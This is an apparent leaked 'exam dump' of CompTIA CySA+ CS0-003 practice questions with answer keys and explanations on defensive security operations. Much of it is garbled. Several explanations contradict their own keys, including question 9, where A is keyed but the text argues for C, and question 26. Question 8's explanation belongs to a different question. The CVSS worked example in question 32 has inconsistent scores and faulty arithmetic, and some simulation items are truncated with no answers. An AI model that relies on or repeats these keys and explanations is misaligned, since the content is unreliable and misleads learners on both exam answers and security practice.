CS0-003

Exam Name: CompTIA Cybersecurity Analyst (CySA+)

Exam

Full version: 408 Q&As

Full version of CS0-003 Dumps

Share some CS0-003 exam dumps below.

1. A security analyst wants to capture large amounts of network data that will be analyzed at a
later time. The packet capture does not need to be in a format that is readable by humans,
since it will be put into a binary file called "packetCapture." The capture must be as efficient as
possible, and the analyst wants to minimize the likelihood that packets will be missed.
Which of the following commands will best accomplish the analyst's objectives?
A. tcpdump -w packetCapture
B. tcpdump -a packetCapture
C. tcpdump -n packetCapture
D. nmap -v > packetCapture
E. nmap -oA > packetCapture
Answer: A
Explanation:
The tcpdump command is a network packet analyzer tool that can capture and display network
traffic. The -w option specifies a file name to write the captured packets to, in a binary format
that can be read by tcpdump or other tools later. This option is useful for capturing large
amounts of network data that will be analyzed at a later time, as the question requires. The
packet capture does not need to be in a format that is readable by humans, since it will be put
into a binary file called “packetCapture”. The capture must be as efficient as possible, and the
-w option minimizes the processing and output overhead of tcpdump, reducing the likelihood
that packets will be missed.

2. A cybersecurity analyst notices unusual network scanning activity coming from a country that
the company does not do business with.
Which of the following is the best mitigation technique?
A. Geoblock the offending source country
B. Block the IP range of the scans at the network firewall.
C. Perform a historical trend analysis and look for similar scanning activity.
D. Block the specific IP address of the scans at the network firewall
Answer: A
Explanation:
Geoblocking is the best mitigation technique for unusual network scanning activity coming from
a country that the company does not do business with, as it can prevent any potential attacks or
data breaches from that country. Geoblocking is the practice of restricting access to websites or
services based on geographic location, usually by blocking IP addresses associated with a
certain country or region. Geoblocking can help reduce the overall attack surface and protect
against malicious actors who may be trying to exploit vulnerabilities or steal information. The
other options are not as effective as geoblocking, as they may not block all the possible sources
of the scanning activity, or they may not address the root cause of the problem. Official
Reference: https://www.blumira.com/geoblocking/
https://www.avg.com/en/signal/geo-blocking
3. A security team identified several rogue Wi-Fi access points during the most recent network
scan.
The network scans occur once per quarter.
Which of the following controls would best all ow the organization to identity rogue devices more
quickly?
A. Implement a continuous monitoring policy.
B. Implement a BYOD policy.
C. Implement a portable wireless scanning policy.
D. Change the frequency of network scans to once per month.
Answer: A
Explanation:
The best control to allow the organization to identify rogue devices more quickly is A. Implement
a continuous monitoring policy. A continuous monitoring policy is a set of procedures and tools
that enable an organization to detect and respond to unauthorized or anomalous activities on its
network in real time or near real time. A continuous monitoring policy can help identify rogue
access points as soon as they appear on the network, rather than waiting for quarterly or
monthly scans. A continuous monitoring policy can also help improve the overall security
posture and compliance of the organization by providing timely and accurate information about
its network assets, vulnerabilities, threats, and incidents1.

4. SIMULATION
A healthcare organization must develop an action plan based on the findings from a risk
assessment.
The action plan must consist of:
? Risk categorization
? Risk prioritization
. Implementation of controls

INSTRUCTIONS
Click on the audit report, risk matrix, and SLA expectations documents to review their contents.
On the Risk categorization tab, determine the order in which the findings must be prioritized for
remediation according to the risk rating score. Then, assign a categorization to each risk.
On the Controls tab, select the appropriate control(s) to implement for each risk finding.
Findings may have more than one control implemented. Some controls may be used more than
once or not at all.
If at any time you would like to bring back the initial state of the simulation, please click the
Reset All button.

Answer:

5. A security analyst has prepared a vulnerability scan that contains all of the company's
functional subnets. During the initial scan, users reported that network printers began to print
pages that contained unreadable text and icons.
Which of the following should the analyst do to ensure this behavior does not oocur during
subsequent vulnerability scans?
A. Perform non-credentialed scans.
B. Ignore embedded web server ports.
C. Create a tailored scan for the printer subnet.
D. Increase the threshold length of the scan timeout.
Answer: C
Explanation:
The best way to prevent network printers from printing pages during a vulnerability scan is to
create a tailored scan for the printer subnet that excludes the ports and services that trigger the
printing behavior. The other options are not effective for this purpose: performing non-
credentialed scans may not reduce the impact on the printers; ignoring embedded web server
ports may not cover all the possible ports that cause printing; increasing the threshold length of
the scan timeout may not prevent the printing from occurring.
Reference: According to the CompTIA CySA+ Study Guide: Exam CS0-003, 3rd Edition1, one
of the objectives for the exam is to “use appropriate tools and methods to manage, prioritize
and respond to attacks and vulnerabilities”. The book also covers the usage and syntax of
vulnerability scanning tools, such as Nessus, Nmap, and Qualys, in chapter 4. Specifically, it
explains the meaning and function of each component in vulnerability scanning, such as
credentialed vs. non-credentialed scans, port scanning, and scan scheduling1, pages 149-160.
It also discusses the common issues and challenges of vulnerability scanning, such as network
disruptions, false positives, and scan scope1, pages 161-162. Therefore, this is a reliable
source to verify the answer to the question.

6. SIMULATION
An organization's website was maliciously altered.

INSTRUCTIONS
Review information in each tab to select the source IP the analyst should be concerned about,
the indicator of compromise, and the two appropriate corrective actions.
Answer:
Step 1: Analyzing the SFTP Log
The SFTP log provides a record of file transfer and login activities:
User “sjames” logged in from several IP addresses:
7. While observing several host machines, a security analyst notices a program is overwriting
data to a buffer.
Which of the following controls will best mitigate this issue?
A. Data execution prevention
B. Output encoding
C. Prepared statements
D. Parameterized queries
Answer: A
Explanation:
Data execution prevention (DEP) is a security feature that prevents code from being executed in
memory regions that are marked as data-only. This helps mitigate buffer overflow attacks, which
are a type of attack where a program overwrites data to a buffer beyond its allocated size,
potentially allowing malicious code to be executed. DEP can be implemented at the hardware or
software level and can prevent unauthorized code execution in memory buffers.
Reference: CompTIA Cybersecurity Analyst (CySA+) Certification Exam Objectives (CS0-002),
page 10; https://docs.microsoft.com/en-us/windows/win32/memory/data-execution-prevention

8. A company is deploying new vulnerability scanning software to assess its systems. The
current network is highly segmented, and the networking team wants to minimize the number of
unique firewall rules.
Which of the following scanning techniques would be most efficient to achieve the objective?
A. Deploy agents on all systems to perform the scans.
B. Deploy a central scanner and perform non-credentialed scans.
C. Deploy a cloud-based scanner and perform a network scan.
D. Deploy a scanner sensor on every segment and perform credentialed scans.
Answer: A
Explanation:
USB ports are a common attack vector that can be used to deliver malware, steal data, or
compromise systems. The first step to mitigate this vulnerability is to check the configurations of
the company assets and disable or restrict the USB ports if possible. This will prevent
unauthorized devices from being connected and reduce the attack surface. The other options
are also important, but they are not the first priority in this scenario.
Reference: CompTIA CySA+ CS0-003 Certification Study Guide, page 247
What are Attack Vectors: Definition & Vulnerabilities, section “How to secure attack vectors”
Are there any attack vectors for a printer connected through USB in a Windows environment?,
answer by user “schroeder”

9. A security analyst is investigating a compromised Linux server.

The analyst issues the ps command and receives the following output:

Which of the following commands should the administrator run next to further analyze the
compromised system?
A. gbd /proc/1301
B. rpm -V openssh-server
C. /bin/Is -1 /proc/1301/exe
D. kill -9 1301
Answer: A
Explanation:
/bin/ls -1 /proc/1301/exe is the command that will show the absolute path to the executed binary
file associated with the process ID 1301, which is ./usr/sbin/sshd. This information can help the
security analyst determine if the binary is an official version and has not been modified, which
could be an indicator of a compromise. /proc/1301/exe is a special symbolic link that points to
the executable file that was used to start the process 1301.
Reference: https://unix.stackexchange.com/questions/197854/how-does-the-proc-pid-exe-
symlink-differ-from-ordinary-symlinks

10. A SOC manager receives a phone call from an upset customer. The customer received a
vulnerability report two hours ago: but the report did not have a follow-up remediation response
from an analyst.
Which of the following documents should the SOC manager review to ensure the team is
meeting the appropriate contractual obligations for the customer?
A. SLA
B. MOU
C. NDA
D. Limitation of liability
Answer: A
Explanation:
SLA stands for service level agreement, which is a contract or document that defines the
expectations and obligations between a service provider and a customer regarding the quality,
availability, performance, or scope of a service. An SLA may also specify the metrics, penalties,
or remedies for measuring or ensuring compliance with the agreed service levels. An SLA can
help the SOC manager review if the team is meeting the appropriate contractual obligations for
the customer, such as response time, resolution time, reporting frequency, or communication
channels.

11. HOW many employees Clicked on the link in the Phishing email?
12. An incident response team is working with law enforcement to investigate an active web
server compromise. The decision has been made to keep the server running and to implement
compensating controls for a period of time. The web service must be accessible from the
internet via the reverse proxy and must connect to a database server.
Which of the following compensating controls will help contain the adversary while meeting the
other requirements? (Select two).
A. Drop the tables on the database server to prevent data exfiltration.
B. Deploy EDR on the web server and the database server to reduce the adversaries
capabilities.
C. Stop the httpd service on the web server so that the adversary can not use web exploits
D. use micro segmentation to restrict connectivity to/from the web and database servers.
E. Comment out the HTTP account in the / etc/passwd file of the web server
F. Move the database from the database server to the web server.
Answer: BD
Explanation:
Deploying EDR on the web server and the database server to reduce the adversaries
capabilities and using micro segmentation to restrict connectivity to/from the web and database
servers are two compensating controls that will help contain the adversary while meeting the
other requirements. A compensating control is a security measure that is implemented to
mitigate the risk of a vulnerability or an attack when the primary control is not feasible or
effective. EDR stands for Endpoint Detection and Response, which is a tool that monitors
endpoints for malicious activity and provides automated or manual response capabilities. EDR
can help contain the adversary by detecting and blocking their actions, such as data exfiltration,
lateral movement, privilege escalation, or command execution. Micro segmentation is a
technique that divides a network into smaller segments based on policies and rules, and applies
granular access controls to each segment. Micro segmentation can help contain the adversary
by isolating the web and database servers from other parts of the network, and limiting the
traffic that can flow between them. Official
Reference: https://partners.comptia.org/docs/default-source/resources/comptia-cysa-
cs0-002-exam-objectives
https://www.comptia.org/certifications/cybersecurity-analyst
https://www.comptia.org/blog/the-new-comptia-cybersecurity-analyst-your-questions-answered

13. A risk assessment concludes that the perimeter network has the highest potential for
compromise by
an attacker, and it is labeled as a critical risk environment.
Which of the following is a valid compensating control to reduce the volume of valuable
information in the perimeter network that an attacker could gain using active reconnaissance
techniques?
A. A control that demonstrates that all systems authenticate using the approved authentication
method
B. A control that demonstrates that access to a system is only allowed by using SSH
C. A control that demonstrates that firewall rules are peer reviewed for accuracy and approved
before deployment
D. A control that demonstrates that the network security policy is reviewed and updated yearly
Answer: C
Explanation:
A valid compensating control to reduce the volume of valuable information in the perimeter
network that an attacker could gain using active reconnaissance techniques is a control that
demonstrates that firewall rules are peer reviewed for accuracy and approved before
deployment. This control can help ensure that the firewall rules are configured correctly and
securely, and that they do not allow unnecessary or unauthorized access to the perimeter
network. The other options are not compensating controls or do not address the risk of active
reconnaissance.
Reference: CompTIA Cybersecurity Analyst (CySA+) Certification Exam Objectives (CS0-002),
page 14; https://www.isaca.org/resources/isaca-journal/issues/2016/volume-3/compensating-
controls

14. A security analyst needs to ensure that systems across the organization are protected
based on the sensitivity of the content each system hosts. The analyst is working with the
respective system owners to help determine the best methodology that seeks to promote
confidentiality, availability,
and integrity of the data being hosted.
Which of the following should the security analyst perform first to
categorize and prioritize the respective systems?
A. Interview the users who access these systems,
B. Scan the systems to see which vulnerabilities currently exist.
C. Configure alerts for vendor-specific zero-day exploits.
D. Determine the asset value of each system.
Answer: D
Explanation:
Determining the asset value of each system is the best action to perform first, as it helps to
categorize and prioritize the systems based on the sensitivity of the data they host. The asset
value is a measure of how important a system is to the organization, in terms of its financial,
operational, or reputational impact. The asset value can help the security analyst to assign a
risk level and a protection level to each system, and to allocate resources accordingly. The
other actions are not as effective as determining the asset value, as they do not directly address
the goal of promoting confidentiality, availability, and integrity of the data. Interviewing the users
who access these systems may provide some insight into how the systems are used and what
data they contain, but it may not reflect the actual value or sensitivity of the data from an
organizational perspective. Scanning the systems to see which vulnerabilities currently exist
may help to identify and remediate some security issues, but it does not help to categorize or
prioritize the systems based on their data sensitivity. Configuring alerts for vendor-specific zero-
day exploits may help to detect and respond to some emerging threats, but it does not help to
protect the systems based on their data sensitivity.

15. An analyst is evaluating a vulnerability management dashboard. The analyst sees that a
previously remediated vulnerability has reappeared on a database server.
Which of the following is the most likely cause?
A. The finding is a false positive and should be ignored.
B. A rollback had been executed on the instance.
C. The vulnerability scanner was configured without credentials.
D. The vulnerability management software needs to be updated.
Answer: B
Explanation:
A rollback had been executed on the instance. If a database server is restored to a previous
state, it may reintroduce a vulnerability that was previously fixed. This can happen due to
backup and recovery operations, configuration changes, or software updates. A rollback can
undo the patching or mitigation actions that were applied to remediate the vulnerability.
Reference: Vulnerability Remediation: It’s Not Just Patching, Section: The Remediation
Process; Vulnerability assessment for SQL Server, Section: Remediation

16. A disgruntled open-source developer has decided to sabotage a code repository with a logic
bomb that will act as a wiper.
Which of the following parts of the Cyber Kill Chain does this act exhibit?
A. Reconnaissance
B. Weaponization
C. Exploitation
D. Installation
Answer: B
Explanation:
Weaponization is the stage of the Cyber Kill Chain where the attacker creates or modifies a
malicious payload to use against a target. In this case, the disgruntled open-source developer
has created a logic bomb that will act as a wiper, which is a type of malware that destroys data
on a system. This is an example of weaponization, as the developer has prepared a
cyberweapon to sabotage the code repository.
Reference: The answer was based on the web search results from Bing, especially the following
sources:
Cyber Kill Chain® | Lockheed Martin, which states: “In the weaponization step, the adversary
creates remote access malware weapon, such as a virus or worm, tailored to one or more
vulnerabilities.” The Cyber Kill Chain: The Seven Steps of a Cyberattack - EC-Council, which
states: “In the weaponization stage, all of the attacker’s preparatory work culminates in the
creation of malware to be used against an identified target.”
What is the Cyber Kill Chain? Introduction Guide - CrowdStrike, which states: “Weaponization:
The attacker creates a malicious payload that will be delivered to the target.”

17. A systems administrator receives reports of an internet-accessible Linux server that is

running very sluggishly. The administrator examines the server, sees a high amount of memory
utilization, and suspects a DoS attack related to half-open TCP sessions consuming memory.
Which of the following tools would best help to prove whether this server was experiencing this
behavior?
A. Nmap
B. TCPDump
C. SIEM
D. EDR
Answer: B
Explanation:
TCPDump is the best tool to prove whether the server was experiencing a DoS attack related to
half-open TCP sessions consuming memory. TCPDump is a command-line tool that can
capture and analyze network traffic, such as TCP, UDP, and ICMP packets. TCPDump can help
the administrator to identify the source and destination of the traffic, the TCP flags and
sequence numbers, the packet size and frequency, and other information that can indicate a
DoS attack. A DoS attack related to half-open TCP sessions is also known as a SYN flood
attack, which is a type of volumetric attack that aims to exhaust the network bandwidth or
resources of the target server by sending a large amount of TCP SYN requests and ignoring the
TCP SYN-ACK responses. This creates a backlog of half-open connections on the server,
which consume memory and CPU resources, and prevent legitimate connections from being
established12. TCPDump can help the administrator to detect a SYN flood attack by looking for
a high number of TCP SYN packets with different source IP addresses, a low number of TCP
SYN-ACK packets, and a very low number of TCP ACK packets34.
Reference: SYN flood DDoS attack | Cloudflare, What is a SYN flood attack and how to prevent
it? | NETSCOUT, TCPDump - A Powerful Tool for Network Analysis and Security, How to
Detect a SYN Flood Attack with TCPDump

18. A Chief Information Officer wants to implement a BYOD strategy for all company laptops
and mobile phones. The Chief Information Security Officer is concerned with ensuring all
devices are patched and running some sort of protection against malicious software.
Which of the following existing technical controls should a security analyst recommend to best
meet all the requirements?
A. EDR
B. Port security
C. NAC
D. Segmentation
Answer: A
Explanation:
EDR stands for endpoint detection and response, which is a type of security solution that
monitors and protects all devices that are connected to a network, such as laptops and mobile
phones. EDR can help to ensure that all devices are patched and running some sort of
protection against malicious software by providing continuous visibility, threat detection, incident
response, and remediation capabilities. EDR can also help to enforce security policies and
compliance requirements across all devices.
Reference: https://www.crowdstrike.com/epp-101/what-is-endpoint-detection-and-response-edr/

19. During a cybersecurity incident, one of the web servers at the perimeter network was
affected by ransomware.
Which of the following actions should be performed immediately?
A. Shut down the server.
B. Reimage the server
C. Quarantine the server
D. Update the OS to latest version.
Answer: C
Explanation:
Quarantining the server is the best action to perform immediately, as it isolates the affected
server from the rest of the network and prevents the ransomware from spreading to other
systems or data.
Quarantining the server also preserves the evidence of the ransomware attack, which can be
useful for forensic analysis and law enforcement investigation. The other actions are not as
urgent as quarantining the server, as they may not stop the ransomware infection, or they may
destroy valuable evidence. Shutting down the server may not remove the ransomware, and it
may trigger a data deletion mechanism by the ransomware. Reimaging the server may restore
its functionality, but it will also erase any traces of the ransomware and make recovery of
encrypted data impossible. Updating the OS to the latest version may fix some vulnerabilities,
but it will not remove the ransomware or decrypt the data. Official
Reference: https://www.cisa.gov/stopransomware/ransomware-guide
https://www.cisa.gov/sites/default/files/publications/Ransomware_Executive_One-
Pager_and_Technical_Document-FINAL.pdf
https://www.cisa.gov/stopransomware/ive-been-hit-ransomware

20. An analyst discovers unusual outbound connections to an IP that was previously blocked at
the web proxy and firewall. Upon further investigation, it appears that the proxy and firewall
rules that were in place were removed by a service account that is not recognized.
Which of the following parts of the Cyber Kill Chain does this describe?
A. Delivery
B. Command and control
C. Reconnaissance
D. Weaporization
Answer: B
Explanation:
The Command and Control stage of the Cyber Kill Chain describes the communication between
the attacker and the compromised system. The attacker may use this channel to send
commands, receive data, or update malware. If the analyst discovers unusual outbound
connections to an IP that was previously blocked, it may indicate that the attacker has
established a command and control channel and bypassed the security controls.
Reference: Cyber Kill Chain® | Lockheed Martin

21. A security team is concerned about recent Layer 4 DDoS attacks against the company
website.
Which of the following controls would best mitigate the attacks?
A. Block the attacks using firewall rules.
B. Deploy an IPS in the perimeter network.
C. Roll out a CDN.
D. Implement a load balancer.
Answer: C
Explanation:
Rolling out a CDN is the best control to mitigate the Layer 4 DDoS attacks against the company
website. A CDN is a Content Delivery Network, which is a system of distributed servers that
deliver web content to users based on their geographic location, the origin of the web page, and
the content delivery server. A CDN can help protect against Layer 4 DDoS attacks, which are
volumetric attacks that aim to exhaust the network bandwidth or resources of the target website
by sending a large amount of traffic, such as SYN floods, UDP floods, or ICMP floods. A CDN
can mitigate these attacks by distributing the traffic across multiple servers, caching the web
content closer to the users, filtering out malicious or unwanted traffic, and providing scalability
and redundancy for the website12.
Reference: How to Stop a DDoS Attack: Mitigation Steps for Each OSI Layer, Application layer
DDoS attack | Cloudflare

22. A cybersecurity analyst is recording the following details

* ID
* Name
* Description
* Classification of information
* Responsible party
In which of the following documents is the analyst recording this information?
A. Risk register
B. Change control documentation
C. Incident response playbook
D. Incident response plan
Answer: A
Explanation:
A risk register typically contains details like ID, name, description, classification of information,
and responsible party. It’s used for tracking identified risks and managing them.
Recording details like ID, Name, Description, Classification of information, and Responsible
party is typically done in a Risk Register. This document is used to identify, assess, manage,
and monitor risks within an organization. It's not directly related to incident response or change
control documentation.

23. A security analyst is working on a server patch management policy that will allow the
infrastructure team to be informed more quickly about new patches.
Which of the following would most likely be required by the infrastructure team so that
vulnerabilities can be remediated quickly? (Select two).
A. Hostname
B. Missing KPI
C. CVE details
D. POC availability
E. loCs
F. npm identifier
Answer: CE
Explanation:
CVE details and IoCs are information that would most likely be required by the infrastructure
team so that vulnerabilities can be remediated quickly. CVE details provide the description,
severity, impact, and solution of the vulnerabilities that affect the servers. IoCs are indicators of
compromise that help identify and respond to potential threats or attacks on the servers.
Reference: Server and
Workstation Patch Management Policy, Section: Policy; Patch Management Policy: Why You
Need One in 2024, Section: What is a patch management policy?

24. An end-of-life date was announced for a widely used OS. A business-critical function is
performed by some machinery that is controlled by a PC, which is utilizing the OS that is
approaching the end-of-life date.
Which of the following best describes a security analyst's concern?
A. Any discovered vulnerabilities will not be remediated.
B. An outage of machinery would cost the organization money.
C. Support will not be available for the critical machinery
D. There are no compensating controls in place for the OS.
Answer: A
Explanation:
A security analyst’s concern is that any discovered vulnerabilities in the OS that is approaching
the end-of-life date will not be remediated by the vendor, leaving the system exposed to
potential attacks. The other options are not directly related to the security analyst’s role or
responsibility.
Verified
Reference: CompTIA Cybersecurity Analyst (CySA+) Certification Exam Objectives, page 9,
section 2.21

25. A company has the following security requirements:

. No public IPs
? All data secured at rest
. No insecure ports/protocols
After a cloud scan is completed, a security analyst receives reports that several
misconfigurations are putting the company at risk.
Given the following cloud scanner output:

Which of the following should the analyst recommend be updated first to meet the security
requirements and reduce risks?
A. VM_PRD_DB
B. VM_DEV_DB
C. VM_DEV_Web02
D. VM_PRD_Web01
Answer: D
Explanation:
This VM has a public IP and an open port 80, which violates the company’s security
requirements of no public IPs and no insecure ports/protocols. It also exposes the VM to
potential attacks from the internet. This VM should be updated first to use a private IP and close
the port 80, or use a secure protocol such as HTTPS.
Reference
[CompTIA CySA+ Study Guide: Exam CS0-003, 3rd Edition], Chapter 2: Cloud and Hybrid
Environments, page 67.
[What is a Public IP Address?]
[What is Port 80?]

26. A security analyst discovers an ongoing ransomware attack while investigating a phishing
email. The analyst downloads a copy of the file from the email and isolates the affected
workstation from the network.
Which of the following activities should the analyst perform next?
A. Wipe the computer and reinstall software
B. Shut down the email server and quarantine it from the network.
C. Acquire a bit-level image of the affected workstation.
D. Search for other mail users who have received the same file.
Answer: C
Explanation:
Searching for other mail users who have received the same file is the best activity to perform
next, as it helps to identify and contain the scope of the ransomware attack and prevent further
damage. Ransomware is a type of malware that encrypts files on a system and demands
payment for their decryption. Ransomware can spread through phishing emails that contain
malicious attachments or
links that download the ransomware. By searching for other mail users who have received the
same file, the analyst can alert them not to open it, delete it from their inboxes, and scan their
systems for any signs of infection. The other activities are not as urgent or effective as
searching for other mail users who have received the same file, as they do not address the
immediate threat of ransomware spreading or affecting more systems. Wiping the computer and
reinstalling software may restore the functionality of the affected workstation, but it will also
erase any evidence of the ransomware attack and make recovery of encrypted files impossible.
Shutting down the email server and quarantining it from the network may stop the delivery of
more phishing emails, but it will also disrupt normal communication and operations for the
organization. Acquiring a bit-level image of the affected workstation may preserve the evidence
of the ransomware attack, but it will not help to stop or remove the ransomware or decrypt the
files.

27. Which of the following stakeholders are most likely to receive a vulnerability scan report?
(Select two).
A. Executive management
B. Law enforcement
C. Marketing
D. Legal
E. Product owner
F. Systems admininstration
Answer: EF
Explanation:
The stakeholders most likely to receive a vulnerability scan report are:
The product owner needs to understand the security posture of the product to make informed
decisions about risk management, mitigation strategies, and prioritizing development resources.
Systems administrators are responsible for maintaining and securing systems. They need the
details from vulnerability scan reports to patch and remediate identified vulnerabilities in the
systems they manage.

28. The Chief Information Security Officer for an organization recently received approval to
install a new EDR solution. Following the installation, the number of alerts that require
remediation by an analyst has tripled.
Which of the following should the organization utilize to best centralize the workload for the
internal security team? (Select two).
A. SOAR
B. SIEM
C. MSP
D. NGFW
E. XDR
F. DLP
Answer: AB
Explanation:
SOAR (Security Orchestration, Automation and Response) and SIEM (Security Information and
Event Management) are solutions that can help centralize the workload for the internal security
team by collecting, correlating, and analyzing alerts from different sources, such as EDR. SOAR
can also automate and streamline incident response workflows, while SIEM can provide
dashboards and reports for security monitoring and compliance.
Reference: What is EDR? Endpoint Detection & Response, How Does the Cyber Kill Chain
Protect Against Attacks?; What is EDR Solution?, EDR solutions secure diverse endpoints
through central monitoring

29. A managed security service provider is having difficulty retaining talent due to an increasing
workload caused by a client doubling the number of devices connected to the network.
Which of the following would best aid in decreasing the workload without increasing staff?
A. SIEM
B. XDR
C. SOAR
D. EDR
Answer: C
Explanation:
SOAR stands for Security Orchestration, Automation and Response, which is a set of features
that can help security teams manage, prioritize and respond to security incidents more
efficiently and effectively. SOAR can help decrease the workload without increasing staff by
automating repetitive tasks, streamlining workflows, integrating different tools and platforms,
and providing actionable insights and recommendations. SOAR is also one of the current trends
that CompTIA CySA+ covers in its exam objectives. Official
Reference: https://www.comptia.org/blog/the-new-comptia-cybersecurity-analyst-your-questions-
answered
https://www.comptia.org/certifications/cybersecurity-analyst
https://partners.comptia.org/docs/default-source/resources/comptia-cysa-cs0-002-exam-
objectives

30.
How many employees clicked on the link in the phishing email?
According to the email server logs, 25 employees clicked on the link in the phishing email.
31. A security analyst needs to mitigate a known, exploited vulnerability related not
tack vector that embeds software through the USB interface.
Which of the following should the analyst do first?
A. Conduct security awareness training on the risks of using unknown and unencrypted USBs.
B. Write a removable media policy that explains that USBs cannot be connected to a company
asset.
C. Check configurations to determine whether USB ports are enabled on company assets.
D. Review logs to see whether this exploitable vulnerability has already impacted the company.
Answer: C
Explanation:
USB ports are a common attack vector that can be used to deliver malware, steal data, or
compromise systems. The first step to mitigate this vulnerability is to check the configurations of
the company assets and disable or restrict the USB ports if possible. This will prevent
unauthorized devices from being connected and reduce the attack surface. The other options
are also important, but they are not the first priority in this scenario.
Reference: CompTIA CySA+ CS0-003 Certification Study Guide, page 247
What are Attack Vectors: Definition & Vulnerabilities, section “How to secure attack vectors”
Are there any attack vectors for a printer connected through USB in a Windows environment?,
answer by user “schroeder”

32. A security analyst reviews the latest vulnerability scans and observes there are
vulnerabilities with similar CVSSv3 scores but different base score metrics.
Which of the following attack vectors should the analyst remediate first?
A. CVSS 3.0/AVP/AC:L/PR:L/UI:N/S U/C:H/I:H/A:H
B. CVSS 3.0/AV:A/AC .L/PR:L/UI:N/S:U/C:H/I:H/A:H
C. CVSS 3.0/AV:N/AC:L/PR:L/UI:N/S;U/C:H/I:H/A:H
D. CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Answer: C
Explanation:
CVSS 3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H is the attack vector that the analyst should
remediate first, as it has the highest CVSSv3 score of 8.1. CVSSv3 (Common Vulnerability
Scoring System version 3) is a standard framework for rating the severity of vulnerabilities,
based on various metrics that reflect the characteristics and impact of the vulnerability. The
CVSSv3 score is calculated from three groups of metrics: Base, Temporal, and Environmental.
The Base metrics are mandatory and reflect the intrinsic qualities of the vulnerability, such as
how it can be exploited, what privileges are required, and what impact it has on confidentiality,
integrity, and availability. The Temporal metrics are optional and reflect the current state of the
vulnerability, such as whether there is a known exploit, a patch, or a workaround. The
Environmental metrics are also optional and reflect the context of the vulnerability in a specific
environment, such as how it affects the asset value, security requirements, or mitigating
controls. The Base metrics produce a score ranging from 0 to 10, which can then be modified by
scoring the Temporal and Environmental metrics. A CVSS score is also represented as a vector
string, a compressed textual representation of the values used to derive the score.
The attack vector in question has the following Base metrics:
Attack Vector (AV): Network (N). This means that the vulnerability can be exploited remotely
over a network connection.
Attack Complexity (AC): Low (L). This means that the attack does not require any special
conditions or changes to the configuration of the target system.
Privileges Required (PR): Low (L). This means that the attacker needs some privileges on the
target system to exploit the vulnerability, such as user-level access.
User Interaction (UI): None (N). This means that the attack does not require any user action or
involvement to succeed.
Scope (S): Unchanged (U). This means that the impact of the vulnerability is confined to the
same security authority as the vulnerable component, such as an application or an operating
system. Confidentiality Impact ©: High (H). This means that the vulnerability results in a total
loss of confidentiality, such as unauthorized disclosure of all data on the system.
Integrity Impact (I): High (H). This means that the vulnerability results in a total loss of integrity,
such as unauthorized modification or deletion of all data on the system.
Availability Impact (A): High (H). This means that the vulnerability results in a total loss of
availability, such as denial of service or system crash.
Using these metrics, we can calculate the Base score using this formula:
Base Score = Roundup(Minimum[(Impact + Exploitability), 10])
Where:
Impact = 6.42 x [1 - ((1 - Confidentiality) x (1 - Integrity) x (1 - Availability))]
Exploitability = 8.22 x Attack Vector x Attack Complexity x Privileges Required x User
Interaction Using this formula, we get:
Impact = 6.42 x [1 - ((1 - 0.56) x (1 - 0.56) x (1 - 0.56))] = 5.9 Exploitability = 8.22 x 0.85 x 0.77 x
0.62 x 0.85 = 2.8
Base Score = Roundup(Minimum[(5.9 + 2.8), 10]) = Roundup(8.7) = 8.8
Therefore, this attack vector has a Base score of 8.8, which is higher than any other option.
The other attack vectors have lower Base scores, as they have different values for some of the
Base metrics:
CVSS:3.0/AV:P/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H has a Base score of 6.2, as it has a lower
value for Attack Vector (Physical), which means that the vulnerability can only be exploited by
having physical access to the target system.
CVSS:3.0/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H has a Base score of 7.4, as it has a lower
value for Attack Vector (Adjacent Network), which means that the vulnerability can only be
exploited by being on the same physical or logical network as the target system.
CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H has a Base score of 6.8, as it has a lower
value for Attack Vector (Local), which means that the vulnerability can only be exploited by
having local access to the target system, such as through a terminal or a command shell.

33. During an incident involving phishing, a security analyst needs to find the source of the
malicious email.
Which of the following techniques would provide the analyst with this information?
A. Header analysis
B. Packet capture
C. SSL inspection
D. Reverse engineering
Answer: A
Explanation:
Header analysis is the technique of examining the metadata of an email, such as the sender,
recipient, date, subject, and routing information. It can help to identify the source of a malicious
email by revealing the IP address and domain name of the originator, as well as any spoofing or
redirection attempts.
Reference: CompTIA CySA+ Study Guide: Exam CS0-003, 3rd Edition, Chapter 6, page 240;
CompTIA CySA+ CS0-003 Certification Study Guide, Chapter 6, page 249.

34. An organization has established a formal change management process after experiencing
several critical system failures over the past year.
Which of the following are key factors that the change management process will include in order
to reduce the impact of system failures? (Select two).
A. Ensure users the document system recovery plan prior to deployment.
B. Perform a full system-level backup following the change.
C. Leverage an audit tool to identify changes that are being made.
D. Identify assets with dependence that could be impacted by the change.
E. Require diagrams to be completed for all critical systems.
F. Ensure that all assets are properly listed in the inventory management system.
Answer: DF
Explanation:
The correct answers for key factors in the change management process to reduce the impact of
system failures are:
D) Identify assets with dependence that could be impacted by the change.
F) Ensure that all assets are properly listed in the inventory management system.
D) Identify assets with dependence that could be impacted by the change: This is crucial in
change management because understanding the interdependencies among assets can help
anticipate and mitigate the potential cascading effects of a change. By identifying these
dependencies, the organization can plan more effectively for changes and minimize the risk of
unintended consequences that could lead to system failures.
F) Ensure that all assets are properly listed in the inventory management system: Maintaining
an accurate and comprehensive inventory of assets is fundamental in change management.
Knowing exactly what assets the organization possesses and their characteristics allows for
better planning and impact analysis when changes are made. This ensures that no critical
component is overlooked during the change process, reducing the risk of failures due to
incomplete information.
Other Options:
A) Ensure users document system recovery plan prior to deployment: While documenting a
system recovery plan is important, it's more related to disaster recovery and business continuity
planning than directly reducing the impact of system failures due to changes.
B) Perform a full system-level backup following the change: While backups are essential, they
are generally a reactive measure to recover from a failure, rather than a proactive measure to
reduce the impact of system failures in the first place.
C) Leverage an audit tool to identify changes that are being made: While using an audit tool is
